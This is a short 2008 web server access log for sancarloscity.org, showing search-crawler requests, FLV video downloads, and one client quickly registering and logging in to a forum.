193.47.80.36 - - [15/Nov/2008:04:43:48 -0800] "GET /broadbandinternet.htm HTTP/1.1" 200 12374 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:43:58 -0800] "GET /sampo/flv/11132008/5.flv HTTP/1.1" 200 3538944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
12.25.213.2 - - [15/Nov/2008:04:43:59 -0800] "GET /sampo/flv/11132008/1.flv HTTP/1.1" 200 786432 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:18 -0800] "GET /jodera2/index.php HTTP/1.0" 200 61943 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
72.30.79.34 - - [15/Nov/2008:04:44:25 -0800] "GET /picgallery/displayimage.php?album=random&cat=0&pos=-281 HTTP/1.0" 200 10078 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:26 -0800] "GET /jodera2/viewforum.php?f=1&sid=d6759448d30031c7c71fb7010210a387 HTTP/1.0" 200 85333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:28 -0800] "GET /jodera2/profile.php?mode=register HTTP/1.0" 200 14310 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:29 -0800] "GET /jodera2/profile.php?mode=register&agreed=true HTTP/1.0" 200 30036 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:31 -0800] "POST /jodera2/profile.php HTTP/1.0" 200 32046 "http://sancarloscity.org/jodera2/profile.php?mode=register&agreed=true" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:32 -0800] "GET /jodera2/login.php HTTP/1.0" 200 12333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
94.102.60.74 - - [15/Nov/2008:04:44:33 -0800] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://sancarloscity.org/jodera2/login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "sancarloscity.org"
